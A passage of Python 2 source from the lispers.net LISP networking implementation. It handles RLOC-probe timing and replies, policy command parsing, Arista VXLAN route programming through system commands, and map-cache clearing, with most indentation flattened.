entry["last-registerer"] = addr
entry["ams"] = "yes" if (se.accept_more_specifics) else "no"
entry["dynamic"] = "yes" if (se.dynamic) else "no"
entry["site-id"] = str(se.site_id)
if (se.xtr_id_present):
entry["xtr-id"] = "0x"+ lisp_hex_string(se.xtr_id)
#endif
#
# Encode in RLOC-set which is an array of entries.
#
rloc_set = []
for rloc in se.registered_rlocs:
r = {}
r["address"] = rloc.rloc.print_address_no_iid() if rloc.rloc_exists() \
else "none"
if (rloc.geo): r["geo"] = rloc.geo.print_geo()
if (rloc.elp): r["elp"] = rloc.elp.print_elp(False)
if (rloc.rle): r["rle"] = rloc.rle.print_rle(False)
if (rloc.json): r["json"] = rloc.json.print_json(False)
if (rloc.rloc_name): r["rloc-name"] = rloc.rloc_name
r["uptime"] = lisp_print_elapsed(rloc.uptime)
r["upriority"] = str(rloc.priority)
r["uweight"] = str(rloc.weight)
r["mpriority"] = str(rloc.mpriority)
r["mweight"] = str(rloc.mweight)
rloc_set.append(r)
#endfor
entry["registered-rlocs"] = rloc_set
data.append(entry)
return([True, data])
#enddef
#
# lisp_process_api_site_cache_entry
#
# Parse API parameters in dictionary array, do longest match lookup.
#
def lisp_process_api_site_cache_entry(parms):
iid = parms["instance-id"]
iid = 0 if (iid == "") else int(iid)
#
# Get EID or source of (S,G).
#
eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
eid.store_prefix(parms["eid-prefix"])
#
# See if we are doing a group lookup. Make that destination and the EID
# the source.
#
group = lisp_address(LISP_AFI_NONE, "", 0, iid)
if (parms.has_key("group-prefix")):
group.store_prefix(parms["group-prefix"])
#endif
data = []
se = lisp_site_eid_lookup(eid, group, False)
if (se): lisp_gather_site_cache_data(se, data)
return(data)
#enddef
#
# lisp_get_interface_instance_id
#
# Return instance-ID from lisp_interface() class.
#
def lisp_get_interface_instance_id(device, source_eid):
interface = None
if (lisp_myinterfaces.has_key(device)):
interface = lisp_myinterfaces[device]
#endif
#
# Didn't find an instance-ID configured on a "lisp interface", return
# the default.
#
if (interface == None or interface.instance_id == None):
return(lisp_default_iid)
#endif
#
# If there is a single interface data structure for a given device,
# return the instance-ID configured for it. Otherwise, check to see
# if this is a multi-tenant EID-prefix. And then test all configured
# prefixes in each lisp_interface() for a best match. This allows
# for multi-tenancy on a single xTR interface.
#
iid = interface.get_instance_id()
if (source_eid == None): return(iid)
save_iid = source_eid.instance_id
best = None
for interface in lisp_multi_tenant_interfaces:
if (interface.device != device): continue
prefix = interface.multi_tenant_eid
source_eid.instance_id = prefix.instance_id
if (source_eid.is_more_specific(prefix) == False): continue
if (best == None or best.multi_tenant_eid.mask_len < prefix.mask_len):
best = interface
#endif
#endfor
source_eid.instance_id = save_iid
if (best == None): return(iid)
return(best.get_instance_id())
#enddef
#
# lisp_allow_dynamic_eid
#
# Returns dynamic-eid-device (or device if "dynamic-eid-device" not configured)
# if supplied EID matches configured dynamic-EID in a "lisp interface" command.
# Otherwise, returns None.
#
def lisp_allow_dynamic_eid(device, eid):
if (lisp_myinterfaces.has_key(device) == False): return(None)
interface = lisp_myinterfaces[device]
return_interface = device if interface.dynamic_eid_device == None else \
interface.dynamic_eid_device
if (interface.does_dynamic_eid_match(eid)): return(return_interface)
return(None)
#enddef
#
# lisp_start_rloc_probe_timer
#
# Set the RLOC-probe timer to expire in 1 minute (by default).
#
def lisp_start_rloc_probe_timer(interval, lisp_sockets):
global lisp_rloc_probe_timer
if (lisp_rloc_probe_timer != None): lisp_rloc_probe_timer.cancel()
func = lisp_process_rloc_probe_timer
timer = threading.Timer(interval, func, [lisp_sockets])
lisp_rloc_probe_timer = timer
timer.start()
return
#enddef
#
# lisp_show_rloc_probe_list
#
# Print out the lisp_rloc_probe_list in a readable way for debugging.
#
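# lisp_rloc_probe_list is keyed by an RLOC address string; each value is an
# array of [lisp_rloc(), eid, group] entries that share that RLOC, as the
# loop below shows.
#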
def lisp_show_rloc_probe_list():
lprint(bold("----- RLOC-probe-list -----", False))
for key in lisp_rloc_probe_list:
rloc_array = lisp_rloc_probe_list[key]
lprint("RLOC {}:".format(key))
for r, e, g in rloc_array:
lprint(" [{}, {}, {}, {}]".format(hex(id(r)), e.print_prefix(),
g.print_prefix(), r.translated_port))
#endfor
#endfor
lprint(bold("---------------------------", False))
return
#enddef
#
# lisp_mark_rlocs_for_other_eids
#
# When the parent RLOC that we have RLOC-probe state for becomes reachable or
# goes unreachable, set the state appropriately for other EIDs using the SAME
# RLOC. The parent is the first RLOC in the eid-list.
#
def lisp_mark_rlocs_for_other_eids(eid_list):
#
# Don't process parent but put its EID in printed list.
#
rloc, e, g = eid_list[0]
eids = [lisp_print_eid_tuple(e, g)]
for rloc, e, g in eid_list[1::]:
rloc.state = LISP_RLOC_UNREACH_STATE
rloc.last_state_change = lisp_get_timestamp()
eids.append(lisp_print_eid_tuple(e, g))
#endfor
unreach = bold("unreachable", False)
rloc_str = red(rloc.rloc.print_address_no_iid(), False)
for eid in eids:
e = green(eid, False)
lprint("RLOC {} went {} for EID {}".format(rloc_str, unreach, e))
#endfor
#
# For each EID, tell external data-plane about new RLOC-set (RLOCs minus
# the ones that just went unreachable).
#
for rloc, e, g in eid_list:
mc = lisp_map_cache.lookup_cache(e, True)
if (mc): lisp_write_ipc_map_cache(True, mc)
#endfor
return
#enddef
#
# lisp_process_rloc_probe_timer
#
# Periodic RLOC-probe timer has expired. Go through cached RLOCs from map-
# cache and decide to suppress or rate-limit RLOC-probes. This function
# is also used to time out "unreachability" state so we can start RLOC-probe
# a previously determined unreachable RLOC.
#
def lisp_process_rloc_probe_timer(lisp_sockets):
lisp_set_exception()
lisp_start_rloc_probe_timer(LISP_RLOC_PROBE_INTERVAL, lisp_sockets)
if (lisp_rloc_probing == False): return
#
# Debug code. Must rebuild image to set boolean to True.
#
if (lisp_print_rloc_probe_list): lisp_show_rloc_probe_list()
#
# Check for egress multi-homing.
#
default_next_hops = lisp_get_default_route_next_hops()
lprint("---------- Start RLOC Probing for {} entries ----------".format( \
len(lisp_rloc_probe_list)))
#
# Walk the list.
#
count = 0
probe = bold("RLOC-probe", False)
for values in lisp_rloc_probe_list.values():
#
# Just do one RLOC-probe for the RLOC even if it is used for
# multiple EID-prefixes.
#
last_rloc = None
for parent_rloc, eid, group in values:
addr_str = parent_rloc.rloc.print_address_no_iid()
#
# Do not send RLOC-probes to RLOCs that are in down-state or admin-
# down-state. The RLOC-probe reply will apply for all EID-prefixes
# and the RLOC state will be updated for each.
#
if (parent_rloc.down_state()): continue
#
# Do not send multiple RLOC-probes to the same RLOC for
# different EID-prefixes. Multiple RLOC entries could have
# same RLOC address but differnet translated ports. These
# need to be treated as different ETRs (they are both behind
# the same NAT) from an RTR's perspective. On an ITR, if the
# RLOC-names are different for the same RLOC address, we need
# to treat these as different ETRs since an ITR does not keep
# port state for an RLOC.
#
if (last_rloc):
parent_rloc.last_rloc_probe_nonce = \
last_rloc.last_rloc_probe_nonce
if (last_rloc.translated_port == parent_rloc.translated_port \
and last_rloc.rloc_name == parent_rloc.rloc_name):
e = green(lisp_print_eid_tuple(eid, group), False)
lprint("Suppress probe to duplicate RLOC {} for {}". \
format(red(addr_str, False), e))
continue
#endif
#endif
nh = None
rloc = None
while (True):
rloc = parent_rloc if rloc == None else rloc.next_rloc
if (rloc == None): break
#
# First check if next-hop/interface is up for egress multi-
# homing.
#
if (rloc.rloc_next_hop != None):
if (rloc.rloc_next_hop not in default_next_hops):
if (rloc.up_state()):
d, n = rloc.rloc_next_hop
rloc.state = LISP_RLOC_UNREACH_STATE
rloc.last_state_change = lisp_get_timestamp()
lisp_update_rtr_updown(rloc.rloc, False)
#endif
unreach = bold("unreachable", False)
lprint("Next-hop {}({}) for RLOC {} is {}".format(n, d,
red(addr_str, False), unreach))
continue
#endif
#endif
#
# Send RLOC-probe to unreach-state RLOCs if down for a minute.
#
last = rloc.last_rloc_probe
delta = 0 if last == None else time.time() - last
if (rloc.unreach_state() and delta < LISP_RLOC_PROBE_INTERVAL):
lprint("Waiting for probe-reply from RLOC {}".format( \
red(addr_str, False)))
continue
#endif
#
# Check to see if we are in nonce-echo mode and no echo has
# been returned.
#
echo_nonce = lisp_get_echo_nonce(None, addr_str)
if (echo_nonce and echo_nonce.request_nonce_timeout()):
rloc.state = LISP_RLOC_NO_ECHOED_NONCE_STATE
rloc.last_state_change = lisp_get_timestamp()
unreach = bold("unreachable", False)
lprint("RLOC {} went {}, nonce-echo failed".format( \
red(addr_str, False), unreach))
lisp_update_rtr_updown(rloc.rloc, False)
continue
#endif
#
# Suppress sending an RLOC-probe if we just received a nonce-echo in the
# last minute.
#
if (echo_nonce and echo_nonce.recently_echoed()):
lprint(("Suppress RLOC-probe to {}, nonce-echo " + \
"received").format(red(addr_str, False)))
continue
#endif
#
# Check if we have not received a RLOC-probe reply for one
# timer interval. If not, put RLOC state in "unreach-state".
#
if (rloc.last_rloc_probe != None):
last = rloc.last_rloc_probe_reply
if (last == None): last = 0
delta = time.time() - last
if (rloc.up_state() and \
delta >= LISP_RLOC_PROBE_REPLY_WAIT):
rloc.state = LISP_RLOC_UNREACH_STATE
rloc.last_state_change = lisp_get_timestamp()
lisp_update_rtr_updown(rloc.rloc, False)
unreach = bold("unreachable", False)
lprint("RLOC {} went {}, probe it".format( \
red(addr_str, False), unreach))
lisp_mark_rlocs_for_other_eids(values)
#endif
#endif
rloc.last_rloc_probe = lisp_get_timestamp()
reach = "" if rloc.unreach_state() == False else " unreachable"
#
# Send Map-Request RLOC-probe. We may have to send one for each
# egress interface to the same RLOC address. Install host
# route in RLOC so we can direct the RLOC-probe on an egress
# interface.
#
nh_str = ""
n = None
if (rloc.rloc_next_hop != None):
d, n = rloc.rloc_next_hop
lisp_install_host_route(addr_str, n, True)
nh_str = ", send on nh {}({})".format(n, d)
#endif
#
# Print integrated log message before sending RLOC-probe.
#
rtt = rloc.print_rloc_probe_rtt()
astr = addr_str
if (rloc.translated_port != 0):
astr += ":{}".format(rloc.translated_port)
#endif
                astr = red(astr, False)
if (rloc.rloc_name != None):
astr += " (" + blue(rloc.rloc_name, False) + ")"
#endif
lprint("Send {}{} {}, last rtt: {}{}".format(probe, reach,
astr, rtt, nh_str))
#
# If we are doing multiple egress interfaces, check for host
# routes. We don't want the ones we selected for forwarding to
# affect the path RLOC-probes go out in the following loop. We
# will restore the host route while waiting for RLOC-replies.
# Then we'll select a new host route based on best RTT.
#
if (rloc.rloc_next_hop != None):
nh = lisp_get_host_route_next_hop(addr_str)
if (nh): lisp_install_host_route(addr_str, nh, False)
#endif
#
# Might be first time and other RLOCs on the chain may not
# have RLOC address. Copy now.
#
if (rloc.rloc.is_null()):
rloc.rloc.copy_address(parent_rloc.rloc)
#endif
#
# Send RLOC-probe Map-Request.
#
seid = None if (group.is_null()) else eid
deid = eid if (group.is_null()) else group
lisp_send_map_request(lisp_sockets, 0, seid, deid, rloc)
last_rloc = parent_rloc
#
# Remove installed host route.
#
if (n): lisp_install_host_route(addr_str, n, False)
#endwhile
#
            # Reinstall host route for forwarding.
#
if (nh): lisp_install_host_route(addr_str, nh, True)
#
# Send 10 RLOC-probes and then sleep for 20 ms.
#
count += 1
if ((count % 10) == 0): time.sleep(0.020)
#endfor
#endfor
lprint("---------- End RLOC Probing ----------")
return
#enddef
#
# lisp_update_rtr_updown
#
# The lisp-itr process will send an IPC message to the lisp-etr process for
# the RLOC-probe status change for an RTR.
#
def lisp_update_rtr_updown(rtr, updown):
global lisp_ipc_socket
#
# This is only done on an ITR.
#
if (lisp_i_am_itr == False): return
#
    # When the xtr-parameter indicates to register all RTRs, we are doing it
    # unconditionally so we don't care about the status. Suppress IPC messages.
#
if (lisp_register_all_rtrs): return
rtr_str = rtr.print_address_no_iid()
#
    # Check if the RTR address is in the RTR list the lisp-itr process learned
    # from the map-server.
#
if (lisp_rtr_list.has_key(rtr_str) == False): return
updown = "up" if updown else "down"
lprint("Send ETR IPC message, RTR {} has done {}".format(
red(rtr_str, False), bold(updown, False)))
#
# Build IPC message.
#
ipc = "rtr%{}%{}".format(rtr_str, updown)
ipc = lisp_command_ipc(ipc, "lisp-itr")
lisp_ipc(ipc, lisp_ipc_socket, "lisp-etr")
return
#enddef
#
# lisp_process_rloc_probe_reply
#
# We have received a RLOC-probe Map-Reply, process it.
#
def lisp_process_rloc_probe_reply(rloc_addr, source, port, nonce, hop_count,
ttl):
probe = bold("RLOC-probe reply", False)
map_reply_addr = rloc_addr.print_address_no_iid()
source_addr = source.print_address_no_iid()
pl = lisp_rloc_probe_list
#
# If we can't find RLOC address from the Map-Reply in the probe-list,
    # maybe the same ETR is sourcing from a different address. Check
# that address in the probe-list.
#
addr = map_reply_addr
if (pl.has_key(addr) == False):
addr += ":" + str(port)
if (pl.has_key(addr) == False):
addr = source_addr
if (pl.has_key(addr) == False):
addr += ":" + str(port)
lprint(" Received unsolicited {} from {}/{}".format(probe,
red(map_reply_addr, False), red(source_addr, False)))
return
#endif
#endif
#endif
#
# Look for RLOC in the RLOC-probe list for EID tuple and fix-up stored
# RLOC-probe state.
#
for rloc, eid, group in lisp_rloc_probe_list[addr]:
if (lisp_i_am_rtr and rloc.translated_port != 0 and
rloc.translated_port != port): continue
rloc.process_rloc_probe_reply(nonce, eid, group, hop_count, ttl)
#endfor
return
#enddef
#
# lisp_db_list_length
#
# Returns the number of entries that need to be registered. This will include
# static and dynamic EIDs.
#
def lisp_db_list_length():
count = 0
for db in lisp_db_list:
count += len(db.dynamic_eids) if db.dynamic_eid_configured() else 1
count += len(db.eid.iid_list)
    #endfor
    return(count)
#enddef
#
# lisp_is_myeid
#
# Return true if supplied EID is the EID for this system.
#
def lisp_is_myeid(eid):
for db in lisp_db_list:
if (db.eid.is_exact_match(eid)): return(True)
#endfor
return(False)
#enddef
#
# lisp_format_macs
#
# Take two MAC address strings and format them with dashes and place them in
# a format string "0000-1111-2222 -> 3333-4444-5555" for displaying in
# lisp.dprint().
#
def lisp_format_macs(sa, da):
sa = sa[0:4] + "-" + sa[4:8] + "-" + sa[8:12]
da = da[0:4] + "-" + da[4:8] + "-" + da[8:12]
return("{} -> {}".format(sa, da))
#enddef
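#
# For illustration (MAC values below are hypothetical), assuming 12-character
# hex strings as input, lisp_format_macs("0050b612f4aa", "0050b6cc0102")
# returns "0050-b612-f4aa -> 0050-b6cc-0102".
#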
#
# lisp_get_echo_nonce
#
# Get lisp_nonce_echo() state from lisp_nonce_echo_list{}.
#
def lisp_get_echo_nonce(rloc, rloc_str):
if (lisp_nonce_echoing == False): return(None)
if (rloc): rloc_str = rloc.print_address_no_iid()
echo_nonce = None
if (lisp_nonce_echo_list.has_key(rloc_str)):
echo_nonce = lisp_nonce_echo_list[rloc_str]
#endif
return(echo_nonce)
#enddef
#
# lisp_decode_dist_name
#
# When we have reached an AFI=17 in an EID or RLOC record, return the
# distinguished name, and new position of packet.
#
def lisp_decode_dist_name(packet):
count = 0
dist_name = ""
while(packet[0:1] != "\0"):
if (count == 255): return([None, None])
dist_name += packet[0:1]
packet = packet[1::]
count += 1
#endwhile
packet = packet[1::]
return(packet, dist_name)
#enddef
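#
# Illustrative sketch (the name is made up): for a packet buffer beginning
# with the bytes "webcam1\0<rest-of-packet>", lisp_decode_dist_name() returns
# the tuple (<rest-of-packet>, "webcam1"), i.e. the buffer advanced past the
# null byte and the decoded distinguished-name string.
#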
#
# lisp_write_flow_log
#
# The supplied flow_log variable is an array of flow tuples whose last
# element is a lisp_packet; the leading elements are passed to the packet's
# print_flow() method. This function is called and run in its own thread and
# then exits.
#
def lisp_write_flow_log(flow_log):
f = open("./logs/lisp-flow.log", "a")
count = 0
for flow in flow_log:
packet = flow[3]
flow_str = packet.print_flow(flow[0], flow[1], flow[2])
f.write(flow_str)
count += 1
#endfor
f.close()
del(flow_log)
count = bold(str(count), False)
lprint("Wrote {} flow entries to ./logs/lisp-flow.log".format(count))
return
#enddef
#
# lisp_policy_command
#
# Configure "lisp policy" commands for all processes that need it.
#
def lisp_policy_command(kv_pair):
p = lisp_policy("")
set_iid = None
match_set = []
for i in range(len(kv_pair["datetime-range"])):
match_set.append(lisp_policy_match())
#endfor
for kw in kv_pair.keys():
value = kv_pair[kw]
#
# Check for match parameters.
#
if (kw == "instance-id"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
if (match.source_eid == None):
match.source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
if (match.dest_eid == None):
match.dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
match.source_eid.instance_id = int(v)
match.dest_eid.instance_id = int(v)
#endfor
#endif
if (kw == "source-eid"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
if (match.source_eid == None):
match.source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
iid = match.source_eid.instance_id
match.source_eid.store_prefix(v)
match.source_eid.instance_id = iid
#endfor
#endif
if (kw == "destination-eid"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
if (match.dest_eid == None):
match.dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
iid = match.dest_eid.instance_id
match.dest_eid.store_prefix(v)
match.dest_eid.instance_id = iid
#endfor
#endif
if (kw == "source-rloc"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.source_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
match.source_rloc.store_prefix(v)
#endfor
#endif
if (kw == "destination-rloc"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.dest_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
match.dest_rloc.store_prefix(v)
#endfor
#endif
if (kw == "rloc-record-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.rloc_record_name = v
#endfor
#endif
if (kw == "geo-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.geo_name = v
#endfor
#endif
if (kw == "elp-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.elp_name = v
#endfor
#endif
if (kw == "rle-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.rle_name = v
#endfor
#endif
if (kw == "json-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.json_name = v
#endfor
#endif
if (kw == "datetime-range"):
for i in range(len(match_set)):
v = value[i]
match = match_set[i]
if (v == ""): continue
l = lisp_datetime(v[0:19])
u = lisp_datetime(v[19::])
if (l.valid_datetime() and u.valid_datetime()):
match.datetime_lower = l
match.datetime_upper = u
#endif
#endfor
#endif
#
# Check for set parameters.
#
if (kw == "set-action"):
p.set_action = value
#endif
if (kw == "set-record-ttl"):
p.set_record_ttl = int(value)
#endif
if (kw == "set-instance-id"):
if (p.set_source_eid == None):
p.set_source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
if (p.set_dest_eid == None):
p.set_dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
set_iid = int(value)
p.set_source_eid.instance_id = set_iid
p.set_dest_eid.instance_id = set_iid
#endif
if (kw == "set-source-eid"):
if (p.set_source_eid == None):
p.set_source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
p.set_source_eid.store_prefix(value)
if (set_iid != None): p.set_source_eid.instance_id = set_iid
#endif
if (kw == "set-destination-eid"):
if (p.set_dest_eid == None):
p.set_dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
p.set_dest_eid.store_prefix(value)
if (set_iid != None): p.set_dest_eid.instance_id = set_iid
#endif
if (kw == "set-rloc-address"):
p.set_rloc_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
p.set_rloc_address.store_address(value)
#endif
if (kw == "set-rloc-record-name"):
p.set_rloc_record_name = value
#endif
if (kw == "set-elp-name"):
p.set_elp_name = value
#endif
if (kw == "set-geo-name"):
p.set_geo_name = value
#endif
if (kw == "set-rle-name"):
p.set_rle_name = value
#endif
if (kw == "set-json-name"):
p.set_json_name = value
#endif
if (kw == "policy-name"):
p.policy_name = value
#endif
#endfor
#
# Store match clauses and policy.
#
p.match_clauses = match_set
p.save_policy()
return
#enddef
lisp_policy_commands = {
"lisp policy" : [lisp_policy_command, {
"policy-name" : [True],
"match" : [],
"instance-id" : [True, 0, 0xffffffff],
"source-eid" : [True],
"destination-eid" : [True],
"source-rloc" : [True],
"destination-rloc" : [True],
"rloc-record-name" : [True],
"elp-name" : [True],
"geo-name" : [True],
"rle-name" : [True],
"json-name" : [True],
"datetime-range" : [True],
"set-action" : [False, "process", "drop"],
"set-record-ttl" : [True, 0, 0x7fffffff],
"set-instance-id" : [True, 0, 0xffffffff],
"set-source-eid" : [True],
"set-destination-eid" : [True],
"set-rloc-address" : [True],
"set-rloc-record-name" : [True],
"set-elp-name" : [True],
"set-geo-name" : [True],
"set-rle-name" : [True],
"set-json-name" : [True] } ]
}
#
# lisp_send_to_arista
#
# Send supplied CLI command to Arista so it can be configured via its design
# rules.
#
def lisp_send_to_arista(command, interface):
interface = "" if (interface == None) else "interface " + interface
cmd_str = command
if (interface != ""): cmd_str = interface + ": " + cmd_str
lprint("Send CLI command '{}' to hardware".format(cmd_str))
commands = '''
enable
configure
{}
{}
'''.format(interface, command)
os.system("FastCli -c '{}'".format(commands))
return
#enddef
#
# lisp_arista_is_alive
#
# Ask hardware if EID-prefix is alive. Return True if so.
#
def lisp_arista_is_alive(prefix):
cmd = "enable\nsh plat trident l3 software routes {}\n".format(prefix)
output = commands.getoutput("FastCli -c '{}'".format(cmd))
#
# Skip over header line.
#
output = output.split("\n")[1]
flag = output.split(" ")
flag = flag[-1].replace("\r", "")
#
# Last column has "Y" or "N" for hit bit.
#
return(flag == "Y")
#enddef
#
# lisp_program_vxlan_hardware
#
# This function is going to populate hardware that can do VXLAN encapsulation.
# It will add an IPv4 route via the kernel pointing to a next-hop on a
# VLAN interface that is being bridged to other potential VTEPs.
#
# The responsibility of this routine is to do the following programming:
#
# route add <eid-prefix> <next-hop>
# arp -s <next-hop> <mac-address>
#
# to the kernel and to do this Arista specific command:
#
# mac address-table static <mac-address> vlan 4094 interface vxlan 1
# vtep <vtep-address>
#
# Assumptions are:
#
# (1) Next-hop address is on the subnet for interface vlan4094.
# (2) VXLAN routing is already setup and will bridge <mac-address> to
# the VTEP address this function supplies.
# (3) A "ip virtual-router mac-address" is configured that will match the
# algorithmic mapping this function is doing between VTEP's IP address
# and the MAC address it will listen on to do VXLAN routing.
#
# The required configuration on the VTEPs are:
#
# vlan 4094
# interface vlan4094
# ip address ... ! <next-hop> above point to subnet
#
# interface Vxlan1
# vxlan source-interface Loopback0
# vxlan vlan 4094 vni 10000
# vxlan flood vtep add 17.17.17.17 ! any address to bring up vlan4094
#
# int loopback0
# ip address a.b.c.d/m ! this is the VTEP or RLOC <vtep-address>
#
# ip virtual-router mac-address 0000.00bb.ccdd
#
def lisp_program_vxlan_hardware(mc):
#
# For now, only do this on an Arista system. There isn't a python
# specific signature so just look to see if /persist/local/lispers.net
# exists.
#
if (os.path.exists("/persist/local/lispers.net") == False): return
#
# If no RLOCs, just return. Otherwise program the first RLOC.
#
if (len(mc.best_rloc_set) == 0): return
#
# Get EID-prefix and RLOC (VTEP address) in string form.
#
eid_prefix = mc.eid.print_prefix_no_iid()
rloc = mc.best_rloc_set[0].rloc.print_address_no_iid()
#
# Check to see if route is already present. If so, just return.
#
route = commands.getoutput("ip route get {} | egrep vlan4094".format( \
eid_prefix))
if (route != ""):
lprint("Route {} already in hardware: '{}'".format( \
green(eid_prefix, False), route))
return
#endif
#
# Look for a vxlan interface and a vlan4094 interface. If they do not
# exist, issue message and return. If we don't have an IP address on
# vlan4094, then exit as well.
#
ifconfig = commands.getoutput("ifconfig | egrep 'vxlan|vlan4094'")
if (ifconfig.find("vxlan") == -1):
lprint("No VXLAN interface found, cannot program hardware")
return
#endif
if (ifconfig.find("vlan4094") == -1):
lprint("No vlan4094 interface found, cannot program hardware")
return
#endif
ipaddr = commands.getoutput("ip addr | egrep vlan4094 | egrep inet")
if (ipaddr == ""):
lprint("No IP address found on vlan4094, cannot program hardware")
return
#endif
ipaddr = ipaddr.split("inet ")[1]
ipaddr = ipaddr.split("/")[0]
#
# Get a unique next-hop IP address on vlan4094's subnet. To be used as
# a handle to get VTEP's mac address. And then that VTEP's MAC address
# is a handle to tell VXLAN to encapsulate IP packet (with frame header)
# to the VTEP address.
#
arp_entries = []
arp_lines = commands.getoutput("arp -i vlan4094").split("\n")
for line in arp_lines:
if (line.find("vlan4094") == -1): continue
if (line.find("(incomplete)") == -1): continue
nh = line.split(" ")[0]
arp_entries.append(nh)
#endfor
nh = None
local = ipaddr
ipaddr = ipaddr.split(".")
for i in range(1, 255):
ipaddr[3] = str(i)
addr = ".".join(ipaddr)
if (addr in arp_entries): continue
if (addr == local): continue
nh = addr
break
#endfor
if (nh == None):
lprint("Address allocation failed for vlan4094, cannot program " + \
"hardware")
return
#endif
#
    # Derive MAC address from VTEP address and associate it with the next-hop
    # address on vlan4094. This MAC address must be the MAC address on the
    # foreign VTEP configured with "ip virtual-router mac-address <mac>".
#
rloc_octets = rloc.split(".")
octet1 = lisp_hex_string(rloc_octets[1]).zfill(2)
octet2 = lisp_hex_string(rloc_octets[2]).zfill(2)
octet3 = lisp_hex_string(rloc_octets[3]).zfill(2)
mac = "00:00:00:{}:{}:{}".format(octet1, octet2, octet3)
arista_mac = "0000.00{}.{}{}".format(octet1, octet2, octet3)
arp_command = "arp -i vlan4094 -s {} {}".format(nh, mac)
os.system(arp_command)
#
# Add VXLAN entry for MAC address.
#
vxlan_command = ("mac address-table static {} vlan 4094 " + \
"interface vxlan 1 vtep {}").format(arista_mac, rloc)
lisp_send_to_arista(vxlan_command, None)
#
# Add route now connecting: eid-prefix -> next-hop -> mac-address ->
# VTEP address.
#
route_command = "ip route add {} via {}".format(eid_prefix, nh)
os.system(route_command)
lprint("Hardware programmed with commands:")
route_command = route_command.replace(eid_prefix, green(eid_prefix, False))
lprint(" " + route_command)
lprint(" " + arp_command)
vxlan_command = vxlan_command.replace(rloc, red(rloc, False))
lprint(" " + vxlan_command)
return
#enddef
#
# lisp_clear_hardware_walk
#
# Remove EID-prefix from kernel.
#
def lisp_clear_hardware_walk(mc, parms):
prefix = mc.eid.print_prefix_no_iid()
os.system("ip route delete {}".format(prefix))
return([True, None])
#enddef
#
# lisp_clear_map_cache
#
# Just create a new lisp_cache data structure. But if we have to program
# hardware, traverse the map-cache.
#
def lisp_clear_map_cache():
global lisp_map_cache, lisp_rloc_probe_list
global lisp_crypto_keys_by_rloc_encap, lisp_crypto_keys_by_rloc_decap
global lisp_rtr_list
clear = bold("User cleared", False)
count = lisp_map_cache.cache_count
lprint("{} map-cache with {} entries".format(clear, count))
if (lisp_program_hardware):
lisp_map_cache.walk_cache(lisp_clear_hardware_walk, None)
#endif
lisp_map_cache = lisp_cache()
#
# Need to clear the RLOC-probe list or else we'll have RLOC-probes
# create incomplete RLOC-records.
#
lisp_rloc_probe_list = {}
#
# Also clear the encap and decap lisp-crypto arrays.
#
lisp_crypto_keys_by_rloc_encap = {}
lisp_crypto_keys_by_rloc_decap = {}
#
# If we are an ITR, clear the RTR-list so a new set of default routes can
# be added when the next Info-Reply comes in.
#
lisp_rtr_list = {}
#
# Tell external data-plane.
#
lisp_process_data_plane_restart(True)
return
#enddef
#
# lisp_encapsulate_rloc_probe
#
# Input to this function is a RLOC-probe Map-Request and the NAT-traversal
# information for an ETR that sits behind a NAT. We need to get the RLOC-probe
# through the NAT so we have to data encapsulate it with a source-port of 4341
# and a destination address and port that was translated by the NAT. That
# information is in the lisp_nat_info() class.
#
def lisp_encapsulate_rloc_probe(lisp_sockets, rloc, nat_info, packet):
if (len(lisp_sockets) != 4): return
local_addr = lisp_myrlocs[0]
#
# Build Map-Request IP header. Source and destination addresses same as
# the data encapsulation outer header.
#
length = len(packet) + 28
ip = struct.pack("BBHIBBHII", 0x45, 0, socket.htons(length), 0, 64,
17, 0, socket.htonl(local_addr.address), socket.htonl(rloc.address))
ip = lisp_ip_checksum(ip)
udp = struct.pack("HHHH", 0, socket.htons(LISP_CTRL_PORT),
socket.htons(length - 20), 0)
#
# Start data encapsulation logic.
#
packet = lisp_packet(ip + udp + packet)
#
# Setup fields we need for lisp_packet.encode().
#
packet.inner_dest.copy_address(rloc)
packet.inner_dest.instance_id = 0xffffff
packet.inner_source.copy_address(local_addr)
packet.inner_ttl = 64
packet.outer_dest.copy_address(rloc)
packet.outer_source.copy_address(local_addr)
packet.outer_version = packet.outer_dest.afi_to_version()
packet.outer_ttl = 64
packet.encap_port = nat_info.port if nat_info else LISP_DATA_PORT
rloc_str = red(rloc.print_address_no_iid(), False)
if (nat_info):
hostname = " {}".format(blue(nat_info.hostname, False))
probe = bold("RLOC-probe request", False)
else:
hostname = ""
probe = bold("RLOC-probe reply", False)
#endif
lprint(("Data encapsulate {} to {}{} port {} for " + \
"NAT-traversal").format(probe, rloc_str, hostname, packet.encap_port))
#
# Build data encapsulation header.
#
if (packet.encode(None) == None): return
packet.print_packet("Send", True)
raw_socket = lisp_sockets[3]
packet.send_packet(raw_socket, packet.outer_dest)
del(packet)
return
#enddef
#
# lisp_get_default_route_next_hops
#
# Put the interface names of each next-hop for the IPv4 default in an array
# and return to caller. The array has elements of [<device>, <nh>].
#
def lisp_get_default_route_next_hops():
#
# Get default route next-hop info differently for MacOS.
#
if (lisp_is_macos()):
cmd = "route -n get default"
fields = commands.getoutput(cmd).split("\n")
gw = interface = None
for f in fields:
if (f.find("gateway: ") != -1): gw = f.split(": ")[1]
